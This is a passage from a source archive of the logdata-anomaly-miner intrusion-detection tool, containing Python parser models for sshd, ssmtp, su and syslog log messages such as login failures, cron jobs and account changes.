FirstMatchModelElement("fm", [ IpAddressDataModelElement("clientip"), SequenceModelElement("seq", [ FixedWordlistDataModelElement("user-type", [b"authenticating", b"invalid"]), 
FixedDataModelElement("s1", b" user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("ip"), IpAddressDataModelElement("ipv6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s4", b" [preauth]") ]) ]) ]), SequenceModelElement("connect", [ FixedDataModelElement("s0", b"Connection from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b" on "), IpAddressDataModelElement("serverip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("sport") ]), SequenceModelElement("disconnectreq", [ FixedDataModelElement("s0", b"Received disconnect from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b":"), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s3", b": "), FixedWordlistDataModelElement("reason", [b"disconnected by user"]) ]), SequenceModelElement("disconnected", [ FixedDataModelElement("s0", b"Disconnected from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), FixedDataModelElement("error-bind", b"error: bind: Cannot assign requested address"), SequenceModelElement("error-max-auth", [ FixedDataModelElement("s0", b"error: maximum authentication attempts exceeded for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), 
FixedDataModelElement("error-cert-exp", b"error: Certificate invalid: expired"), FixedDataModelElement("error-cert-not-yet-valid", b"error: Certificate invalid: not yet valid"), FixedDataModelElement("error-cert-not-listed-principal", b"error: Certificate invalid: name is not a listed principal"), FixedDataModelElement("error-refused-by-options", b"error: Refused by certificate options"), SequenceModelElement("error-channel-setup", [ FixedDataModelElement("s0", b"error: channel_setup_fwd_listener: cannot listen to port: "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("error-auth-key", [ FixedDataModelElement("s0", b"error: Authentication key "), DelimitedDataModelElement("asym-algorithm", b" "), FixedDataModelElement("s1", b" "), DelimitedDataModelElement("hash", b" "), FixedDataModelElement("s2", b" revoked by file "), AnyByteDataModelElement("file") ]), SequenceModelElement("error-load-key", [ FixedDataModelElement("s0", b"error: Could not load host key: "), AnyByteDataModelElement("file") ]), SequenceModelElement("ident-missing", [ FixedDataModelElement("s0", b"Did not receive identification string from "), IpAddressDataModelElement("clientip") ]), SequenceModelElement("invalid-user", [ FixedDataModelElement("s0", b"Invalid user "), DelimitedDataModelElement("user", from_str), FixedDataModelElement("s1", from_str), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("invalid-user-auth-req", [ FixedDataModelElement("s0", b"input_userauth_request: invalid user "), DelimitedDataModelElement("user", preauth), FixedDataModelElement("s1", preauth) ]), SequenceModelElement("postppk", [ FixedDataModelElement("s0", b"Postponed publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), 
DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), SequenceModelElement("readerr", [ FixedDataModelElement("s0", b"Read error from remote host "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", b": Connection timed out") ]), SequenceModelElement("disconnect", [ FixedDataModelElement("s0", b"Received disconnect from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s1", b": 11: "), FirstMatchModelElement("reason", [ FixedDataModelElement("disconnected", b"disconnected by user"), SequenceModelElement("remotemsg", [ DelimitedDataModelElement("msg", preauth), FixedDataModelElement("s0", preauth) ]) ]) ]), SequenceModelElement("signal", [ FixedDataModelElement("s0", b"Received signal "), DecimalIntegerValueModelElement("signal"), FixedDataModelElement("s1", b"; terminating.") ]), SequenceModelElement("server", [ FixedDataModelElement("s0", b"Server listening on "), DelimitedDataModelElement("serverip", b" "), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b".") ]), SequenceModelElement("oom-adjust", [ FixedDataModelElement("s0", b"Set /proc/self/oom_score_adj "), OptionalMatchModelElement("from", FixedDataModelElement("default", b"from 0 ")), FixedDataModelElement("s1", b"to "), DecimalIntegerValueModelElement("newval", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ]), SequenceModelElement("session-start", [ FixedDataModelElement("s0", b"Starting session: "), FirstMatchModelElement("sess-info", [ SequenceModelElement("shell", [ FixedDataModelElement("s0", b"shell on "), DelimitedDataModelElement("terminal", b" ") ]), SequenceModelElement("subsystem", [ FixedDataModelElement("s0", b"subsystem \"sftp\"") ]), SequenceModelElement("forced-command", [ FixedDataModelElement("s0", b"forced-command (key-option) \""), 
DelimitedDataModelElement("command", b"\" for "), FixedDataModelElement("s1", b"\"") ]) ]), FixedDataModelElement("s1", b" for "), user_name_model, FixedDataModelElement("s2", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("idinfo", SequenceModelElement("idinfo", [ FixedDataModelElement("s0", b" id "), DecimalIntegerValueModelElement("id") ])) ]), SequenceModelElement("transferred", [ FixedDataModelElement("s0", b"Transferred: sent "), DecimalIntegerValueModelElement("sent"), FixedDataModelElement("s1", b", received "), DecimalIntegerValueModelElement("received"), FixedDataModelElement("s1", b" bytes")]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(sshd:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)")) ]), SequenceModelElement("child", [ FixedDataModelElement("s0", b"User child is on pid "), DecimalIntegerValueModelElement("pid") ]), SequenceModelElement("failed/accept", [ FixedWordlistDataModelElement("s0", [b"Failed ", b"Accepted "]), FixedWordlistDataModelElement("type", [b"password", b"none", b"publickey"]), FixedDataModelElement("s1", b" for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("service") ]), SequenceModelElement("disconnecting", [ FixedDataModelElement("s0", b"Disconnecting "), FixedWordlistDataModelElement("type", [b"authenticating", b"invalid"]), FixedDataModelElement("s1", b" user "), 
DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b": Too many authentication failures [preauth]") ]), SequenceModelElement("fatal", [ FixedDataModelElement("s0", b"fatal: Timeout before authentication for "), IpAddressDataModelElement("ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("cert-auth", [ FixedDataModelElement("s0", b"cert: Authentication tried for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" with valid certificate but not from a permitted source address ("), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b")."), ]), SequenceModelElement("change-root-dir", [ FixedDataModelElement("s0", b"Changed root directory to \""), DelimitedDataModelElement("root-dir", b"\""), FixedDataModelElement("s1", b"\"") ]), FixedDataModelElement("subsystem-request", b"subsystem request for sftp"), SequenceModelElement("conn-write-poll", [ FixedDataModelElement("s0", b"packet_write_poll: Connection from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b": Host is down") ]), SequenceModelElement("debug", [ FixedDataModelElement("s0", b"debug"), DecimalIntegerValueModelElement("debug-num"), FixedDataModelElement("s1", b": "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("s2", b"Got "), DecimalIntegerValueModelElement("num1"), FixedDataModelElement("s3", b"/"), DecimalIntegerValueModelElement("num2"), FixedDataModelElement("s4", b" for keepalive") ]), SequenceModelElement("seq2", [ FixedDataModelElement("s2", b"channel "), DecimalIntegerValueModelElement("channel-num"), FixedDataModelElement("s3", b": request "), DelimitedDataModelElement("mail", b" "), 
FixedDataModelElement("s4", b" confirm "), DecimalIntegerValueModelElement("num") ]), SequenceModelElement("seq3", [ FixedDataModelElement("s2", b"send packet: type "), DecimalIntegerValueModelElement("packet-type") ]), SequenceModelElement("seq4", [ FixedDataModelElement("s2", b"receive packet: type "), DecimalIntegerValueModelElement("packet-type") ]), FixedDataModelElement("do-cleanup", b"do_cleanup"), SequenceModelElement("seq5", [ FixedDataModelElement("s2", b"session_pty_cleanup: session "), DecimalIntegerValueModelElement("sess-num"), FixedDataModelElement("s3", b" release "), AnyByteDataModelElement("file") ]) ]) ]), SequenceModelElement("pam_succeed_if", [ FixedDataModelElement("s0", b"pam_succeed_if(sshd:auth): requirement \"uid >= "), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s1", b"\" not met by user \""), DelimitedDataModelElement("user", b"\""), FixedDataModelElement("s2", b"\"") ]), ] model = SequenceModelElement("sshd", [ FixedDataModelElement("sname", b"sshd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SsmtpParsingModel.py000066400000000000000000000032041500476301700324610ustar00rootroot00000000000000"""This module defines a parser for ssmtp.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement def get_model(): """Return the model.""" type_children = [ SequenceModelElement("sent", [ FixedDataModelElement("s0", b"Sent mail for "), 
DelimitedDataModelElement("to-addr", b" ("), FixedDataModelElement("s1", b" ("), DelimitedDataModelElement("status", b") uid="), FixedDataModelElement("s2", b") uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s3", b" username="), DelimitedDataModelElement("username", b" outbytes="), FixedDataModelElement("s4", b" outbytes="), DecimalIntegerValueModelElement("bytes") ]), SequenceModelElement("sent", [ DelimitedDataModelElement("program", b" "), FixedDataModelElement("s0", b" sent mail for "), AnyByteDataModelElement("user") ]) ] model = SequenceModelElement("ssmtp", [ FixedDataModelElement("sname", b"sSMTP["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SuSessionParsingModel.py000066400000000000000000000046441500476301700333170ustar00rootroot00000000000000"""This module defines a parser for susession.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a su session information message after any standard logging preamble, e.g. 
from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") srcuser_name_model = VariableByteDataModelElement("srcuser", b"0123456789abcdefghijklmnopqrstuvwxyz.-") type_children = [ SequenceModelElement("su-good", [ FixedDataModelElement("s0", b"Successful su for "), user_name_model, FixedDataModelElement("s1", b" by "), srcuser_name_model]), SequenceModelElement("su-good", [ FixedDataModelElement("s0", b"+ "), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s1", b" "), srcuser_name_model, FixedDataModelElement("s2", b":"), user_name_model ]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(su:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", SequenceModelElement("userinfo", [ FixedDataModelElement("s0", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s1", b")") ])) ]) ] model = SequenceModelElement("su", [ FixedDataModelElement("sname", b"su["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SyslogParsingModel.py000066400000000000000000001623501500476301700326430ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from 
aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" user_info = SequenceModelElement("user_info", [ FixedDataModelElement("user_str", b"user=<"), OptionalMatchModelElement( "user", DelimitedDataModelElement("user", b">") ), FixedDataModelElement("method_str", b">"), OptionalMatchModelElement( "method", SequenceModelElement("method", [ FixedDataModelElement("method_str", b", method="), DelimitedDataModelElement("method", b","), ]) ), FixedDataModelElement("rip_str", b", rip="), IpAddressDataModelElement("rip"), FixedDataModelElement("lip_str", b", lip="), IpAddressDataModelElement("lip"), OptionalMatchModelElement( "mpid", SequenceModelElement("mpid", [ FixedDataModelElement("mpid_str", b", mpid="), DecimalIntegerValueModelElement("mpid"), ]) ), OptionalMatchModelElement( "secured", FixedDataModelElement("secured_str", b", secured") ), OptionalMatchModelElement( "tls", FixedDataModelElement("tls_str", b", TLS") ), OptionalMatchModelElement( "handshaking", SequenceModelElement("seq", [ FixedDataModelElement("handshaking_str", b" handshaking:"), DelimitedDataModelElement("msg", b", session=<") ]) ), FixedDataModelElement("session_str", b", session=<"), DelimitedDataModelElement("session", b">"), FixedDataModelElement("bracket_str", b">"), ]) model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%b %d %H:%M:%S"), FixedDataModelElement("sp1", b" "), 
DelimitedDataModelElement("host", b" "), FirstMatchModelElement("service", [ SequenceModelElement("dovecot", [ FixedDataModelElement("dovecot_str", b" dovecot: "), FirstMatchModelElement("imap", [ SequenceModelElement("imap", [ FixedDataModelElement("imap_str", b"imap("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket_str", b"): "), FirstMatchModelElement("message", [ SequenceModelElement("logout", [ FixedDataModelElement("logout_str", b"Logged out in="), DecimalIntegerValueModelElement("in"), FixedDataModelElement("out_str", b" out="), DecimalIntegerValueModelElement("out") ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Error: Failed to autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. ["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), SequenceModelElement("err_open", [ FixedDataModelElement("err_str", b"Error: "), DelimitedDataModelElement("function_name", b"("), FixedDataModelElement("brack_str1", b"("), DelimitedDataModelElement("arg", b")"), FixedDataModelElement("failed_str", b") failed: Permission denied (euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("brack_str2", b"("), DelimitedDataModelElement("euid_user", b")"), FixedDataModelElement("egid_str", b") egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("brack_str3", b"("), DelimitedDataModelElement("egid_user", b")"), FixedDataModelElement("perm_str", b") missing +w perm: "), DelimitedDataModelElement("mail_path", b","), FixedDataModelElement("group_str", b", we're not in group "), DecimalIntegerValueModelElement("group_id"), FixedDataModelElement("brack_str4", b"("), DelimitedDataModelElement("group_name", b")"), FixedDataModelElement("owned_str", b"), dir owned by "), DelimitedDataModelElement("owner", b" "), FixedDataModelElement("mode_str", b" mode="), DelimitedDataModelElement("mode", b")"), 
FixedDataModelElement("brack_str5", b")"), OptionalMatchModelElement( "set", SequenceModelElement("set", [ FixedDataModelElement("set_str", b" (set"), DelimitedDataModelElement("param", b"="), FixedDataModelElement("equal_str", b"="), DelimitedDataModelElement("val", b")"), FixedDataModelElement("brack_str6", b")") ]) ) ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Failed to autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. ["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), ]), ]), SequenceModelElement("imap_login", [ FixedDataModelElement("imap_login_str", b"imap-login: "), FirstMatchModelElement("login", [ SequenceModelElement("disconnected_str", [ FixedDataModelElement("disconnected_str", b"Disconnected "), FirstMatchModelElement("auth", [ SequenceModelElement("auth_failed", [ FixedDataModelElement("auth_failed_str", b"(auth failed, "), DecimalIntegerValueModelElement("attempts"), FixedDataModelElement("attempts_str", b" attempts in "), ]), FixedDataModelElement("no_auth_str", b"(no auth attempts in "), FixedDataModelElement("no_auth_str", b"(disconnected before auth was ready, waited "), ]), DecimalIntegerValueModelElement("duration"), FixedDataModelElement("secs_str", b" secs): "), user_info ]), SequenceModelElement("login", [ FixedDataModelElement("login_str", b"Login: "), user_info ]), SequenceModelElement("anvil", [ FixedDataModelElement("anvil_str", b"Error: anvil:"), AnyByteDataModelElement("anvil_msg") ]), SequenceModelElement("auth_responding", [ FixedDataModelElement("auth_responding_str", b"Warning: Auth process not responding, " b"delayed sending initial response (greeting): "), user_info ]), ]), ]), SequenceModelElement("auth", [ FixedDataModelElement("auth_worker_str", b"auth: "), AnyByteDataModelElement("message") ]), SequenceModelElement("auth_worker", [ FixedDataModelElement("auth_worker_str", b"auth-worker("), 
DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack", b"):"), AnyByteDataModelElement("message") ]), SequenceModelElement("master", [ FixedDataModelElement("master_str", b"master: "), AnyByteDataModelElement("message") ]), SequenceModelElement("ssl_params", [ FixedDataModelElement("ssl_params_str", b"ssl-params: "), AnyByteDataModelElement("message") ]), SequenceModelElement("log", [ FixedDataModelElement("log_str", b"log: "), AnyByteDataModelElement("message") ]), ]) ]), SequenceModelElement("dovecot2", [ FixedDataModelElement("dovecot_str", b" dovecot["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("bracket", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("warning", [ FixedDataModelElement("log_str", b"Warning: "), AnyByteDataModelElement("message") ]), ]) ]), SequenceModelElement("chfn", [ FixedDataModelElement("chfn_str", b" chfn["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_user", b"changed user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("information_str", b"' information") ]), SequenceModelElement("horde", [ FixedDataModelElement("horde_str", b" HORDE: "), FirstMatchModelElement("horde", [ SequenceModelElement("imp", [ FixedDataModelElement("succ_str", b"[imp] "), FirstMatchModelElement("imp", [ SequenceModelElement("login", [ FixedDataModelElement("succ_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), DelimitedDataModelElement("ip", b")"), OptionalMatchModelElement( "fwd", SequenceModelElement( "seq", [ FixedDataModelElement("brack_str2", b") ("), DelimitedDataModelElement("forward", b")"), ]) ), FixedDataModelElement("to_str", b") to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str3", b"}"), ]), SequenceModelElement("message_sent", [ FixedDataModelElement("message_sent_str", b"Message sent to "), 
DelimitedDataModelElement('recepients', b' from'), FixedDataModelElement("from_str", b" from "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("succ_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("to_str", b") to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str2", b"}"), ]), SequenceModelElement("status", [ FixedDataModelElement("status_str", b'[status] Could not open mailbox "INBOX".'), ]), SequenceModelElement("sync_token", [ FixedDataModelElement("sync_token_str", b"[getSyncToken] IMAP error reported by server."), ]), SequenceModelElement("auth_failed", [ FixedDataModelElement("bracket", b"["), DelimitedDataModelElement("type", b"]"), FixedDataModelElement("auth_failed_str", b"] Authentication failed."), ]), ]), ]), SequenceModelElement("horde", [ FixedDataModelElement("succ_str", b"[horde] "), FirstMatchModelElement("horde", [ SequenceModelElement("success", [ FixedDataModelElement("success_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("success", [ FixedDataModelElement("success_str", b"User "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" logged out of Horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("failed_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("to_horde_str", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b")"), ]), ]) ]), 
SequenceModelElement("function", [ FixedWordlistDataModelElement("horde_function", [b"[nag]", b"[turba]", b"[horde]"]), FixedDataModelElement("nag_str", b" PHP ERROR: "), FirstMatchModelElement("php_error", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function_name1", b"("), FixedDataModelElement("brack_str1", b"("), OptionalMatchModelElement( "arg1", DelimitedDataModelElement("arg1", b")") ), FixedDataModelElement("failed_str", b") should be compatible with "), DelimitedDataModelElement("function_name2", b"("), FixedDataModelElement("brack_str2", b"("), OptionalMatchModelElement( "arg2", DelimitedDataModelElement("arg2", b")") ), FixedDataModelElement("brack_str3", b")"), ]), FixedDataModelElement("file_str", b"finfo_file(): Empty filename or path"), FixedDataModelElement("header_str", b"Cannot modify header information - headers already sent") ]) ]), SequenceModelElement("guest", [ FixedDataModelElement("guest_str", b"Guest user is not authorized for Horde (Host: "), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b").") ]), SequenceModelElement("php_error", [ FixedDataModelElement("php_error_str", b"PHP ERROR: "), DelimitedDataModelElement("msg", b" ["), ]), SequenceModelElement("free_msg", [ DelimitedDataModelElement("msg", b" ["), ]) ]), FixedDataModelElement("to_str", b" [pid "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("line_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("of_str", b' of "'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("brack_str", b'"]') ]), SequenceModelElement("useradd", [ FixedDataModelElement("useradd_str", b" useradd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"add '"), DelimitedDataModelElement("user", b"'"), 
FixedDataModelElement("cmd_str", b"' to "), OptionalMatchModelElement("shadow", FixedDataModelElement("shadow", b"shadow ")), FixedDataModelElement("group_str", b"group '"), DelimitedDataModelElement("group", b"'"), FixedDataModelElement("quote_str", b"'") ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("groupadd", [ FixedDataModelElement("groupadd_str", b" groupadd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"group added to "), DelimitedDataModelElement("path", b":"), FixedDataModelElement("cmd_str", b": name="), FirstMatchModelElement("fm", [ SequenceModelElement("gid", [ DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]), AnyByteDataModelElement("group") ]) ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), 
FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("chpasswd", [ FixedDataModelElement("chpasswd_str", b" chpasswd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("pw_changed", b"): password changed for "), AnyByteDataModelElement("user") ]), SequenceModelElement("usermod", [ FixedDataModelElement("usermod_str", b" usermod["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"change user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("pw_str", b"' password") ]), SequenceModelElement("chage", [ FixedDataModelElement("usermod_str", b" chage["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"changed password expiry for "), AnyByteDataModelElement("user") ]), SequenceModelElement("cron", [ FixedWordlistDataModelElement("cron_str", [b" CRON[", b" cron["]), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("cron", [ SequenceModelElement("cmd", [ FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("cmd_str", b") CMD "), AnyByteDataModelElement("cmd_msg") ]), SequenceModelElement("session", [ # This only occurs in auth.log DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", 
b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("pidfile", [ FixedDataModelElement("str", b"(CRON) INFO (pidfile fd = "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("bracket", b")") ]), FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("crontab", [ FixedDataModelElement("crontab_str", b" crontab["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("crontab", [ SequenceModelElement("command", [ FixedDataModelElement("bracket", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b") "), FixedWordlistDataModelElement("command", [b"REPLACE", b"LIST"]), FixedDataModelElement("bracket", b" ("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b")") ]), FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("sudo", [ FixedDataModelElement("cron_str", b" sudo: "), AnyByteDataModelElement("msg") ]), SequenceModelElement("auth", [ # This only occurs in auth.log FixedDataModelElement("auth_str", b" auth: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), 